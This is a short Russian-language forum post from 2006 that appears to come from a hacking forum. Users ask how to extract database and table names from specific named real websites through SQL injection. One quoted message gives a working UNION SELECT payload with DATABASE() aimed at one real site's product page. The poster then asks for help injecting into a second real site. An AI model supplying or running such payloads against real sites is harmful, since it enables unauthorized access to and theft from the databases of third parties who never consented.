21.05.2006, 13:15
|
|
Новичок
Регистрация: 21.05.2006
Сообщений: 7
С нами:
10512338
Репутация:
0
|
|
Сообщение от [alg0n
А не подскажете как узнать имя таблицы через sql-injection? На примере с www.kinga.com.ua.
Например узнать имя БД : вместо null подставить DATABASE(). Есть ли в MySQL такие средства? http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,DATABASE(),4,5,6,7,8,9,10,11 ,12,13,14 ,15,16,17,18,19,20/*
Народ, может и не тут пишу, но нужно узнать возмжна ли sql-injection на сайте http://www.e-d.lt/?ru=1117522100' и если можно пример, для меня это очень важно.
Последний раз редактировалось Metvill; 24.05.2006 в 16:57..
|
|
|